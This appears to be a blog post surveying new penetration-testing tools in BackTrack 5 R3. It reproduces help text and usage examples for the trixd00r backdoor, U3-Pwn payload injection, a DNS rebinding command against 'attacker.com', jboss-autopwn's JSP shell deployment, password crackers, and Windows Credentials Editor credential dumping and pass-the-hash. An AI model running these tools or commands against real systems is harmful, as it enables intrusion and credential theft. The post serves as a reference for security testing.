Welcome Back, My Friends, to the Show That Never Ends…

Testing Backtrack 5R3 - bellow shows 30 new programs and still finding more!!

7 - New Programs in Backdoors
5 - New Programs in exploits
18 - New programs in passwords
8 - New tools in web

root@bt:~# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 10.04.3 LTS
Release: 10.04
Codename: lucid

root@bt:~# cat /etc/issue
BackTrack 5 R3 - 32 Bit \n \l
root@bt:~#

------------------------------------------------

Comparing Backtrack 5R1 programs with Backtrack 5R3

pentest directory

Backtrack 5R1

root@bt:/pentest# ls
backdoors exploits passwords scanners voip
bluetooth forensics python sniffers web
cisco fuzzers reporting stressing windows-binaries
database libs reverse-engineering telephony wireless
enumeration misc rfid tunneling

Backtrack 5R3

root@bt:/pentest# ls
backdoors exploits passwords scanners voip
bluetooth forensics python sniffers web
cisco fuzzers reporting stressing windows-binaries
database libs reverse-engineering telephony wireless
enumeration misc rfid tunneling

No new directorys

------------------------------------------------

Backdoors directory

Backtrack 5R1

root@bt:/pentest/backdoors# ls
3proxy cymothoa dns2tcp iodine ptunnel web

Backtrack 5R3

root@bt:/pentest/backdoors# ls
3proxy dbd intersect powersploit socat u3-pwn web
cymothoa dns2tcp iodine ptunnel trixd00r unix-privesc-check

7 - New Programs in Backdoors

1. dbd - dbd is a Netcat-clone, designed to be portable and offer strong encryption.

2. intersect - Post Exploitation Framework
root@bt:/pentest/backdoors/intersect# ./Create.py

____ _ _ ____ ____ ____ ___ ____ ___ ____
(_ _)( \( )(_ _)( ___)( _ \/ __)( ___)/ __)(_ _)
_)(_ ) ( )( )__) ) /\__ \ )__)( (__ )(
(____)(_)\_) (__) (____)(_)\_)(___/(____)\___) (__)
post-exploitation framework

Intersect 2.5 - Script Creation Utility
------------------------------------------
1 => Create Custom Script
2 => List Available Modules
3 => Load Plugin Module
4 => Exit Creation Utility

=> 2

Intersect 2.5 - Script Creation Utility
------- List of Intersect Modules --------

Standard Modules:
archive creds extras network reversexor scrub
bshell daemon lanmap osuser rshell xorshell

Custom Modules:
aeshttp getrepos openshares portscan privesc~ udpbind xmlcrack
egressbuster icmpshell persistent privesc sniff webproxy xmpp
-------------------------------------------
1 => Return to main menu.
=>

3. powersploit - PowerSploit is a series of Microsoft PowerShell scripts that can be used in post-exploitation scenarios during authorized penetration tests.

4. socat - not sure yet as shows nothing
root@bt:/pentest/backdoors/socat# ls -l
total 0

5. u3-pwn
root@bt:/pentest/backdoors/u3-pwn# ./U3-Pwn.py

~ .__ °.__ 0 o ^ .__ °__ `´
°____) __ __| | | °| ______°____ 0 ____ __ _________|__|/ |_ ___.__.
/ \| | °\ |°| | °/ ___// __ \_/ ___\| | °\_ __ \ o\ __\___ >\___ >____/ |__|° |__||__| / ____|
`´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/ ``´```´```´´´´`´``0_o\/´´`´´

************************************************************************
U3-Pwn Metasploit Payload Injection Tool For SanDisk Devices
************************************************************************

U3-Pwn Main Menu:

1. Generate & Replace Iso Image.
2. Generate & Replace With Custom Exe.
3. Mass U3 Pwnage - Multi device attack.
4. Find Out U3 SanDisk Device Information.
5. Replace Iso Image With Original U3 Iso.
6. About U3-Pwn & Disclaimer.
7. Exit U3-Pwn.

Enter the number:

6. trixd00r - is an advanced and invisible userland backdoor based on TCP/IP for UNIX systems. It consists of a server and a client. The server sits and waits for magic packets using a sniffer. If a magic packet arrives, it will bind a shell over TCP or UDP on the given port or connecting back to the client again over TCP or UDP. The client is used to send magic packets to trigger the server and get a shell.

root@bt:/pentest/backdoors/trixd00r# ./trixd00rd -H
+------------------------------------------+
| trixd00rd - http://www.nullsecurity.net/ |
+------------------------------------------+
usage:

trixd00rd -i [options]

options:

-i - interface to use
-t - magic packet type - ? to list all (default TCP SYN)
-p - magic payload string to trigger shell (default opensesame)
-s - shell mode - ? to list all (default TCP bind port)
-b - port for shell (default 31337)
-a - allow only this host to talk to trixd00rd (default ANY)
-c - connect back host
-z - magic payload string to quit trixd00rd (default byebye)
-d - daemonize trixd00rd and put in background
-n - send no welcome and bye banner
-x - use ssl (only available in priv8 version!)
-v - verbose mode (default quiet)
-V - show trixd00rd version
-H - show help and usage

7. unix-privesc-check

root@bt:/pentest/backdoors/unix-privesc-check# ./unix-privesc-check
unix-privesc-check v1.4 ( http://pentestmonkey.net/tools/unix-privesc-check )

Usage: unix-privesc-check { standard | detailed }

"standard" mode: Speed-optimised check of lots of security settings.

"detailed" mode: Same as standard mode, but also checks perms of open file
handles and called files (e.g. parsed from shell scripts,
linked .so files). This mode is slow and prone to false
positives but might help you find more subtle flaws in 3rd
party programs.

This script checks file permissions and other settings that could allow
local users to escalate privileges.

Use of this script is only permitted on systems which you have been granted
legal permission to perform a security assessment of. Apart from this
condition the GPL v2 applies.

Search the output for the word 'WARNING'. If you don't see it then this
script didn't find any problems.

example

root@bt:/pentest/backdoors/unix-privesc-check# ./unix-privesc-check standard
Assuming the OS is: linux
Starting unix-privesc-check v1.4 ( http://pentestmonkey.net/tools/unix-privesc-check )

This script checks file permissions and other settings that could allow
local users to escalate privileges.

Use of this script is only permitted on systems which you have been granted
legal permission to perform a security assessment of. Apart from this
condition the GPL v2 applies.

Search the output below for the word 'WARNING'. If you don't see it then
this script didn't find any problems.

############################################
Recording hostname
############################################
bt

############################################
Recording uname
############################################
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux

############################################
Recording Interface IP addresses
############################################

----------------------------------------------------

Exploits directory

Backtrack 5R1

root@bt:/pentest/exploits# ls
exploitdb framework isr-evilgrade set
fasttrack framework2 sapyto spamhole

Backtrack 5R3

root@bt:/pentest/exploits# ls
exploitdb framework2 netgear-telnetenable set termineter
fasttrack isr-evilgrade rebind smartphone-pentest-framework websploit
framework jboss-autopwn sapyto spamhole

5 - New Programs in exploits

1. netgear-telnetenable

telnetenable.py
Paul Gebheim
Translated from the C source available from
http://wiki.openwrt.org/oldwiki/openwrtdocs/hardware/netgear/telnetconsole

Running:
python telnetenable.py

IP - The IP of your Netgear device, usually 192.168.1.1

MAC - The mac address should be the MAC address of the LAN port on your Netgear device, WITHOUT the ":". e.g. "00:40:5E:21:14:4E" would be written as "00405E21144E".

Username - Username for accessing the telnet console, usually 'Gearguy'

Password - Password for accessing the telnet console, usually 'Geardog'

2. rebind - Rebind is a tool that implements the multiple A record DNS rebinding attack. Although this tool was originally written to target home routers, it can be used to target any public (non RFC1918) IP address.

./rebind -i eth0 -d attacker.com

3. smartphone-pentest-framework -Looks to be a big tool!

root@bt:/pentest/exploits/smartphone-pentest-framework/frameworkconsole# ./framework.pl
################################################
# #
# Welcome to the Smartphone Pentest Framework! #
# v0.1 #
# Georgia Weidman/Bulb Security #
# #
################################################

Select An Option from the Menu:

1.) Attach Framework to a Deployed Agent
2.) Send Commands to an Agent
3.) View Information Gathered
4.) Attach Framework to a Mobile Modem
5.) Run a remote attack
6.) Run a social engineering or client side attack
7.) Clear/Create Database
0.) Exit

spf>

4. websploit

root@bt:/pentest/exploits/websploit# ./websploit

____ _________ __
/ __ \ / _ \ ___) \ \
| | | | ___| |_) ) \ ______\ \ ___ _ ___
| | | |/ __) _ >( __ )> \ / _ \| ( )
_\ \/ /_> _)| |_) ) /__| || |/ ^ ( (_) ) || |
(___||___)___) __/_____)_||_/_/ \_\___/ \_)\_)
| |
|_|

[*] WebSploit Toolkit [*]
[*] Version : 1.9 [*]
[*] Codename : '#Joyless OpS' [*]
[*] Report Bug : 0x0ptim0us@Gmail.com [*]
[*] Created By : Fardin Allahverdinazhand [*]
[*] Developer : Milad Kahsari Alhadi (C3phalex1n_0x)[*]
[*] Follow Me On Twitter : 0x0ptim0us [*]

Project Home : http://sourceforge.net/projects/websploit
Development TM : Secure-Land.Net

ID & Name Description
------------ --------------
[1]WebSite Attack Vector Scanners,Crawlers For WebSite
[2]Network Attack Vector Network Attack Tools
[3]Automatic Exploiter Automatic Exploit Vulnerability
[4]Format Infector Inject Custom Payload Into File Formats
[5]Web Tools WebSite Tools

[88]Update Update WebSploit Toolkit
[99]Exit Exit

wsf >

5. jboss-autopwn

This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to
provide an interactive session.

USAGE
=====

Use e.sh for *nix targets that use bind_tcp and reverse_tcp

./e.sh target_ip tcp_port

Use e2.sh for Windows targets that can execute Metasploit Windows payloads

/e2.sh target_ip tcp_port

EXAMPLES
========

Linux bind shell:

[root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[x] .war file created successfully in /tmp
[x] Now deploying .war file:
http://192.168.1.2:8080/browser/browser/browser.jsp
[x] Running as user...:
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[x] Server uname...:

------------------------------------------------

Passwords directory

Backtrack 5R1

root@bt:/pentest/passwords# ls
cewl crunch hashcat-utils oclhashcat pack
chntpw cupp john oclhashcat+ sipcrack
cmospwd hashcat keimpx oclhashcat-lite wordlists

Backtrack 5R3

root@bt:/pentest/passwords# ls
acccheck findmyhash keimpx phrasendrescher sucrack
cewl hashcat manglefizz pipal truecrack
chntpw hashcat-gui oclhashcat rainbowcrack twofi
cmospwd hashcat-utils oclhashcat+ rainbowcrack-mt wce
creddump hash-identifier oclhashcat-lite sipcrack wordlists
crunch john pack smbexec
cupp johnny patator statsprocessor

18 New programs in passwords

1. acccheck

root@bt:/pentest/passwords/acccheck# ./acccheck.pl

acccheck.pl v0.2.1 - By Faiz

Description:
Attempts to connect to the IPC$ and ADMIN$ shares depending on which flags have been
chosen, and tries a combination of usernames and passwords in the hope to identify
the password to a given account via a dictionary password guessing attack.

Usage = ./acccheck.pl [optional]

-t [single host IP address]
OR
-T [file containing target ip address(es)]

Optional:
-p [single password]
-P [file containing passwords]
-u [single user]
-U [file containing usernames]
-v [verbose mode]

Examples
Attempt the 'Administrator' account with a [BLANK] password.
acccheck.pl -t 10.10.10.1
Attempt all passwords in 'password.txt' against the 'Administrator' account.
acccheck.pl -t 10.10.10.1 -P password.txt
Attempt all password in 'password.txt' against all users in 'users.txt'.
acccehck.pl -t 10.10.10.1 -U users.txt -P password.txt
Attempt a single password against a single user.
acccheck.pl -t 10.10.10.1 -u administrator -p password

2. findmyhash

root@bt:/pentest/passwords/findmyhash# ./findmyhash.py
./findmyhash.py 1.1.2 ( http://code.google.com/p/findmyhash/ )

Usage:
------

python ./findmyhash.py OPTIONS

Accepted algorithms are:
------------------------

MD4 - RFC 1320
MD5 - RFC 1321
SHA1 - RFC 3174 (FIPS 180-3)
SHA224 - RFC 3874 (FIPS 180-3)
SHA256 - FIPS 180-3
SHA384 - FIPS 180-3
SHA512 - FIPS 180-3
RMD160 - RFC 2857
GOST - RFC 5831
WHIRLPOOL - ISO/IEC 10118-3:2004
LM - Microsoft Windows hash
NTLM - Microsoft Windows hash
MYSQL - MySQL 3, 4, 5 hash
CISCO7 - Cisco IOS type 7 encrypted passwords
JUNIPER - Juniper Networks $9$ encrypted passwords
LDAP_MD5 - MD5 Base64 encoded
LDAP_SHA1 - SHA1 Base64 encoded

NOTE: for LM / NTLM it is recommended to introduce both values with this format:
python ./findmyhash.py LM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7
python ./findmyhash.py NTLM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7

Valid OPTIONS are:
------------------

-h If you only want to crack one hash, specify its value with this option.

-f If you have several hashes, you can specify a file with one hash per line.
NOTE: All of them have to be the same type.

-g If your hash cannot be cracked, search it in Google and show all the results.
NOTE: This option ONLY works with -h (one hash input) option.

Examples:
---------

-> Try to crack only one hash.
python ./findmyhash.py MD5 -h 098f6bcd4621d373cade4e832627b4f6

-> Try to crack a JUNIPER encrypted password escaping special characters.
python ./findmyhash.py JUNIPER -h "\$9\$LbHX-wg4Z"

-> If the hash cannot be cracked, it will be searched in Google.
python ./findmyhash.py LDAP_SHA1 -h "{SHA}cRDtpNCeBiql5KOQsKVyrA0sAiA=" -g

-> Try to crack multiple hashes using a file (one hash per line).
python ./findmyhash.py MYSQL -f mysqlhashesfile.txt

Contact:
--------

[Web] http://laxmarcaellugar.blogspot.com/
[Mail/Google+] bloglaxmarcaellugar@gmail.com
[twitter] @laXmarcaellugar

3. phrasendrescher

root@bt:/pentest/passwords/phrasendrescher# ./pd -h
phrasen|drescher 1.1.1 - the passphrase cracker
Copyright (C) 2008 Nico Leidecker; http://www.leidecker.info

Usage: ./pd plugin [options]

Available plugins:
mssql http-raw ssh rsa-dsa

General Options:
h : print this message
v : verbose mode
i from[:to] : incremental mode beginning with word length `from'
and going to `to'
d file : run dictionary based with words from `file'
w number : number of worker threads (default is one)
r rules : specify rewriting rules for the dictionary mode:
A = all characters upper case
F = first character upper case
L = last character upper case
W = first letter of each word to upper case
a = all characters lower case
f = first character lower case
l = last character lower case
w = first letter of each word to lower case
D = prepend digit
d = append digit
e = 1337 characters
x = all rules

Environment Variables::
PD_PLUGINS : the directory containing plugins
PD_CHARMAP : the characters for the incremental mode are
taken from a character list. A customized list
can be specified in the environment variable

4. sucrack - sucrack is multithreaded a Linux/UNIX tool for cracking local user accounts via wordlist bruteforcing su(1).
Before you run sucrack, take a look at the help message or the manpage:

sucrack -h
man sucrack

In order to run sucrack now, you need to specify a wordlist:

sucrack wordlist.txt

You generally will have two options for printing the progress and the
statistics (if you have compiled sucrack with the `--enable-statistics'
flag). Either by using ansi escapes codes, what makes it look nicer or
without. The -a flag indicates, whether ansi escape codes should be used or
not.

sucrack -a wordlist.txt

The interval for reprinting the statistics is set to 3 seconds by default.
You can alter that interval using the -s flag or disable the auto
reprinting functionality and print the output on any key pressed.

sucrack -s 10 -a wordlist.txt

This disables the auto reprinting functionality:

sucrack -c -a wordlist.txt

By default, failed authentications on various Linux distributions causes a
three seconds delay. sucrack is multithreaded, so that while a thread is
waiting those seconds, others can do su. It is not advisable to run sucrack
with more than one worker thread, if there is no such delay, as it slows
down the overall process.
Run sucrack with ten worker threads:

sucrack -w 10 wordlist.txt

There is another thread running, besides of the worker threads. The
dictionary thread reads the words from the wordlist and puts them into
an internal buffer. By default, that buffer is a static array.
You can set the buffer to be a dynamic list with the `--with-dynamic-list'
configuration flag. In both cases, you can alter the size of the buffer
with the -b option. By default, the buffer size is set to the number of
worker threads plus one. Consider, that it can't never be less than that.

sucrack -b 50 -w 10 wordlist.txt

In that example, the dictionary thread will always try to have 50 words
in the buffer to offer them to the 10 worker threads.

If you wan't to su to another user than root, then specify the username
with the -u flag:

sucrack -u myuser wordlist.txt

The rewriter is a helpful addon. It is rewriting the words from the word
list by certain rules and enqueues them to the word buffer. To enable
the rewriter use -r and to set up your rules -l:

sucrack -r -l AFL wordlist.txt

Here is an overview over the rules:

rule description original rewritten

A all characters to upper case myPassword MYPASSWORD
F first character to upper case myPassword MyPassword
L last character to upper case myPassword myPassworD
a all characters to lower case AnotherPASS anotherpass
f first character to lower case AnotherPASS anotherPASS
l last character to lower case AnotherPASS AnotherPASs
D prepend a digit (0..9) password 1password
d append a digit (0..9) password password1
e 1337ify the word password p455w0rd
x enable all of the above rules

All rules run at least once. The `D' and `d' rule rewrite a word ten times
and append each digit once.

Environment Variables

sucrack depends on the responses su gives on a failing authentication.
Because that can vary from version to version and distribution to
distribution you can set the expected responses in environment variables.

environment variable description

SUCRACK_SU_PATH the path to su
SUCRACK_AUTH_FAILURE the response of su, if an authentication fails
SUCRACK_AUTH_SUCCESS the response sucrack should receive, if an
authentication attemp succeeded

It is very important to set SUCRACK_AUTH_SUCCESS to any string that can't
be a response of su and does not appear in the wordlist file. Test it,
before running sucrack:

export SUCRACK_AUTH_SUCCESS=banzaii
grep $SUCRACK_AUTH_SUCCESS wordlist.txt
sucrack wordlist.txt

Troubleshooting & Notice

sucrack was tested on Linux, FreeBSD and NetBSD.OpenBSD is known to not be supported yet.

If you encouter any bugs, not listed in this section, please refer to nico@leidecker.info

5. hashcat

root@bt:/pentest/passwords/hashcat# ./hashcat-cli32.bin --help
hashcat, advanced password recovery

Usage: hashcat [options] hashfile [mask|wordfiles|directories]

=======
Options
=======

* General:

-m, --hash-type=NUM Hash-type, see references below
-a, --attack-mode=NUM Attack-mode, see references below
-V, --version Print version
-h, --help Print help
--eula Print EULA
--quiet Suppress output

* Misc:

--hex-charset Assume charset is given in hex

* Files:

-p, --seperator=CHAR Define seperator char for hashlists/outfile
-o, --output-file=FILE output-file for recovered hashes
--output-format=NUM 0 = hash:pass
1 = hash:hex_pass
2 = hash:pass:hex_pass
--remove Enable remove of hash once it is cracked
--stdout stdout mode
--disable-potfile do not write potfile
--debug-file=FILE debug-file
--debug-mode=NUM 1 = save finding rule (hybrid only)
2 = save original word (hybrid only)
-e, --salt-file=FILE salts-file for unsalted hashlists

* Resources:

-c, --segment-size=NUM Size in MB to cache from the wordfile
-n, --threads=NUM number of threads
-s, --words-skip=NUM skip number of words (for resume)
-l, --words-limit=NUM limit number of words (for distributed)

* Rules:

-r, --rules-file=FILE Rules-file, multi use: -r 1.rule -r 2.rule
-g, --generate-rules=NUM Generate NUM random rules
--generate-rules-func-min=NUM Force NUM functions per random rule min
--generate-rules-func-max=NUM Force NUM functions per random rule max

* Custom charsets:

-1, --custom-charset1=CS User-defined charsets
-2, --custom-charset2=CS Example:
-3, --custom-charset3=CS --custom-charset1=?dabcdef
-4, --custom-charset4=CS Sets charset ?1 to 0123456789abcdef

* Toggle-Case attack-mode specific:

--toggle-min=NUM number of alphas in dictionary minimum
--toggle-max=NUM number of alphas in dictionary maximum

* Mask-attack attack-mode specific:

--pw-min=NUM Password-length minimum
--pw-max=NUM Password-length maximum

* Permutation attack-mode specific:

--perm-min=NUM Filter words shorter than NUM
--perm-max=NUM Filter words larger than NUM

* Table-Lookup attack-mode specific:

-t, --table-file=FILE table file
--table-min=NUM number of chars in dictionary minimum
--table-max=NUM number of chars in dictionary maximum

==========
References
==========

* Built-in charsets:

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;?@[\]^_`{|}~
?h = 8 bit characters from 0xc0 - 0xff
?D = 8 bit characters from german alphabet
?F = 8 bit characters from french alphabet
?R = 8 bit characters from russian alphabet

* Attack modes:

0 = Straight
1 = Combination
2 = Toggle-Case
3 = Brute-force
4 = Permutation
5 = Table-Lookup

* Hash types:

0 = MD5
10 = md5($pass.$salt)
20 = md5($salt.$pass)
100 = SHA1
110 = sha1($pass.$salt)
120 = sha1($salt.$pass)
200 = MySQL
300 = MySQL4.1/MySQL5
400 = phpass, MD5(WordPress), MD5(phpBB3)
500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
800 = SHA-1(Django)
900 = MD4
1000 = NTLM
1100 = Domain Cached Credentials, mscash
1400 = SHA256
1410 = sha256($pass.$salt)
1420 = sha256($salt.$pass)
1600 = md5apr1, MD5(APR), Apache MD5
1700 = SHA512
1710 = sha512($pass.$salt)
1720 = sha512($salt.$pass)
1800 = SHA-512(Unix)
2600 = Double MD5
3300 = MD5(Sun)
3500 = md5(md5(md5($pass)))
3610 = md5(md5($salt).$pass)
3710 = md5($salt.md5($pass))
3810 = md5($salt.$pass.$salt)
3910 = md5(md5($pass).md5($salt))
4010 = md5($salt.md5($salt.$pass))
4110 = md5($salt.md5($pass.$salt))
4210 = md5($username.0.$pass)
4300 = md5(strtoupper(md5($pass)))
4400 = md5(sha1($pass))
4500 = sha1(sha1($pass))
4600 = sha1(sha1(sha1($pass)))
4700 = sha1(md5($pass))
4800 = MD5(Chap)

* Specific hash types:

101 = nsldap, SHA-1(Base64), Netscape LDAP SHA
111 = nsldaps, SSHA-1(Base64), Netscape LDAP SSHA
121 = SMF > v1.1
131 = MSSQL
2611 = vBulletin v3.8.5
2811 = IPB2+, MyBB1.2+

6. manglefizz

root@bt:/pentest/passwords/manglefizz# ./manglefizz
manglefizz v1.1 by Fizz

./manglefizz [options]

OPTIONS:

-f , --forenames
Input text file containing a list of forenames, one per line. If
not specified, the file 'first.txt' is used.

-l , --length
Restrict the length of the output to a number of characters. Must
be 6 or larger, but no larger than 20.

-n, --number
Adds the numbers 1, 2 or 3 to the end of a mangled username. Must
be used with a length specification.

-o , --output
Output text file of mangled names, one per line. If not spefified
then output is sent to stdout.

-p , --postfix
The text to be appended to the end of all mangled user names.

-r , --prefix
The text to be prefixed to the begining of all mangled user names.

-s , --surnames
Input text file containing a list of surnames, one per line. If
not specified, the file 'last.txt' is used.

-v, --verbose
Will output version and summary information.

-x, --extreme-verbose
Verbose on drugs. Includes all verbose output, plus debug info.

MANGLE:

first, firstname, forename
Will represent a single line from the forenames text file. Cannot be
used together with 'initial' or 'initials'.

initial
Will represent a single initial, a letter from a-z. Cannot be used
together with 'first', 'firstname', 'forename' or 'initials'.

initials
Will represent single or double character initials, letter(s) from a-zz.
Cannot be used together with 'first', 'firstname', 'forename' or
'initial'.

last, lastname, forenames
Will represent a single line from the surnames text file.

-, ., _
These represent seperator characters. One seperator character only.
Can only be used to seperate.

MANGLE EXAMPLES:

For a forename of John and a surname of Doe

initialforename = jdoe

first.lastname = john.doe

lastnameinitial = doej

7. pipal - Pipal, Password Analyser on a password dump from the DC

Usage is fairly simple, -? will give you full instructions:

$ ./pipal.rb -?
pipal 1.0 Robin Wood (robin@digininja.org) (www.digininja.org)

Usage: pipal [OPTION] ... FILENAME
--help, -h: show help
--top, -t X: show the top X results (default 10)
--output, -o : output to file
--external, -e : external file to compare words against

FILENAME: The file to count

8. truecrack - ha ha like to see how long this would take! lol

root@bt:/pentest/passwords/truecrack# ./truecrack
Bruteforce password cracker for Truecrypt volume.
Optimazed with Nvidia Cuda technology.
Based on TrueCrypt, freely available at http://www.truecrypt.org/
Copyright (c) 2011 by Luca Vaccaro
Usage: ./truecrack options [ inputfile | value ] volumefile
-h --help Display this usage information.
-t --truecrypt FILE Truecrypt volume file.
-w --wordlist FILE Wordlist mode, read words from FILE.
-m --maxlength INT Charset mode, max length of words generated.
-c --charset STRING Charset mode, create words from charset STRING.
-b --blocksize INT Block size of words parallel computed.
-v --verbose Show cracked passwords.

9. hashcat-gui - hashcat-gui is a graphical user interface for the hashcat tools "hashcat",

root@bt:/pentest/passwords/hashcat-gui# ./hashcat-gui32.bin

10. rainbowcrack

root@bt:/pentest/passwords/rainbowcrack# ./rcrack
RainbowCrack 1.5
Copyright 2003-2010 RainbowCrack Project. All rights reserved.
Official Website: http://project-rainbowcrack.com/

usage: rcrack rt_files [rt_files ...] -h hash
rcrack rt_files [rt_files ...] -l hash_list_file
rcrack rt_files [rt_files ...] -f pwdump_file
rcrack rt_files [rt_files ...] -n pwdump_file
rt_files: path to the rainbow table(s), wildchar(*, ?) supported
-h hash: load single hash
-l hash_list_file: load hashes from a file, each hash in a line
-f pwdump_file: load lanmanager hashes from pwdump file
-n pwdump_file: load ntlm hashes from pwdump file

hash algorithms implemented in alglib0.so:
lm, plaintext_len limit: 0 - 7
ntlm, plaintext_len limit: 0 - 15
md5, plaintext_len limit: 0 - 15
sha1, plaintext_len limit: 0 - 20
mysqlsha1, plaintext_len limit: 0 - 20
halflmchall, plaintext_len limit: 0 - 7
ntlmchall, plaintext_len limit: 0 - 15
oracle-SYSTEM, plaintext_len limit: 0 - 10
md5-half, plaintext_len limit: 0 - 15

example: rcrack *.rt -h 5d41402abc4b2a76b9719d911017c592
rcrack *.rt -l hash.txt

11. twofi

When attempting to crack passwords custom word lists are very useful additions to
standard dictionaries. An interesting idea originally released on the "7 Habits of
Highly Effective Hackers" blog was to use Twitter to help generate those lists
based on searches for keywords related to the list that is being cracked. I've
expanded this idea into which will take multiple search terms and return a
word list sorted by most common first.

root@bt:/pentest/passwords/twofi# ./twofi.rb
You must specify at least one search term or username

twofi 1.0 Robin Wood (robin@digininja.org) (www.digininja.org)
twofi - Twitter Words Of Interest

Usage: twofi [OPTIONS]
--help, -h: show help
--count, -c: include the count with the words
--min_word_length, -m: minimum word length
--term_file, -T file: a file containing a list of terms
--terms, -t: comma separated search terms
quote words containing spaces, no space after commas
--user_file, -U file: a file containing a list of users
--users, -u: comma separated search terms
quote words containing spaces, no space after commas
--verbose, -v: verbose

11. rainbowcrack-mt

root@bt:/pentest/passwords/rainbowcrack-mt# ./rcracki_mt
RainbowCrack (improved, multi-threaded) 2.0 - Making a Faster Cryptanalytic Time-Memory Trade-Off
by Martin Westergaard
multi-threaded and enhanced by neinbrucke
http://www.freerainbowtables.com/
original code by Zhu Shuanglei
http://www.antsight.com/zsl/rainbowcrack/

usage: rcracki_mt -h hash rainbow_table_pathname
rcracki_mt -l hash_list_file rainbow_table_pathname
rcracki_mt -f pwdump_file rainbow_table_pathname
rcracki_mt -c lst_file rainbow_table_pathname

-h hash: use raw hash as input
-l hash_list_file: use hash list file as input, each hash in a line
-f pwdump_file: use pwdump file as input, handles lanmanager hash only
-c lst_file: use .lst (cain format) file as input
-r [-s session_name]: resume from previous session, optional session name
rainbow_table_pathname: pathname(s) of the rainbow table(s)

Extra options: -t [nr] use this amount of threads/cores, default is 1
-o [output_file] write (temporary) results to this file
-s [session_name] write session data with this name
-k keep precalculation on disk
-m [megabytes] limit memory usage
-v show debug information

example: rcracki_mt -h 5d41402abc4b2a76b9719d911017c592 -t 2 [path]/MD5
rcracki_mt -l hash.txt [path_to_specific_table]/*
rcracki_mt -f hash.txt -t 4 -o results.txt *.rti

12. wce - Windows Credentials Editor v1.3beta (32-bit)

Windows Credentials Editor provides the following options:

Options:
-l List logon sessions and NTLM credentials (default).
-s Changes NTLM credentials of current logon session.
Parameters: :::.
-r Lists logon sessions and NTLM credentials indefinitely.
Refreshes every 5 seconds if new sessions are found.
Optional: -r.
-c Run in a new session with the specified NTLM credentials.
Parameters: .
-e Lists logon sessions NTLM credentials indefinitely.
Refreshes every time a logon event occurs.
-o saves all output to a file.
Parameters: .
-i Specify LUID instead of use current logon session.
Parameters: .
-d Delete NTLM credentials from logon session.
Parameters: .
-a Use Addresses.
Parameters:
-f Force 'safe mode'.
-g Generate LM & NT Hash.
Parameters: .
-K Dump Kerberos tickets to file (unix & 'windows wce' form
at)
-k Read Kerberos tickets from file and insert into Windows
cache
-w Dump cleartext passwords stored by the digest authentication package
-v verbose output.

Examples:

* List current logon sessions

C:\>wce -l
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* List current logon sessions with verbose output enabled

C:\>wce -l -v
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Current Logon Session LUID: 00064081h
Logon Sessions Found: 8
WIN-REK2HG6EBIS\auser:NTLM
LUID:0006409Fh
WIN-REK2HG6EBIS\auser:NTLM
LUID:00064081h
NT AUTHORITY\ANONYMOUS LOGON:NTLM
LUID:00019137h
NT AUTHORITY\IUSR:Negotiate
LUID:000003E3h
NT AUTHORITY\LOCAL SERVICE:Negotiate
LUID:000003E5h
WORKGROUP\WIN-REK2HG6EBIS$:Negotiate
LUID:000003E4h
\:NTLM
LUID:0000916Ah
WORKGROUP\WIN-REK2HG6EBIS$:NTLM
LUID:000003E7h

00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* Change NTLM credentials associated with current logon session

C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of current logon session (00064081h) to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

* Add/Change NTLM credentials of a logon session (not the current one)

C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Och
oa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of logon session 000003E5h to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

* Delete NTLM credentials associated with a logon session

C:\>wce -d 3e5
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

NTLM credentials successfully deleted!

* Run WCE indefinitely, waiting for new credentials/logon sessions.
Refresh is performed every time a logon event is registered in the Event Log.

C:\>wce -e

* Run WCE indefinitely, waiting for new credentials/logon sessions
Refresh is every 5 seconds by default.

C:\>wce -r

* Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes very 5 seconds)

C:\>wce -r5

* Generate LM & NT Hash.

C:\>wce -g test

WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Herna
n Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Password: test
Hashes: 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537

* Dump Kerberos tickets to file (unix & 'windows wce' format)

C:\>wce -K
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Herna
n Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Converting and saving TGT in UNIX format to file wce_ccache...
Converting and saving tickets in Windows WCE Format to file wce_krbtkts..
5 kerberos tickets saved to file 'wce_ccache'.
5 kerberos tickets saved to file 'wce_krbtkts'.
Done!

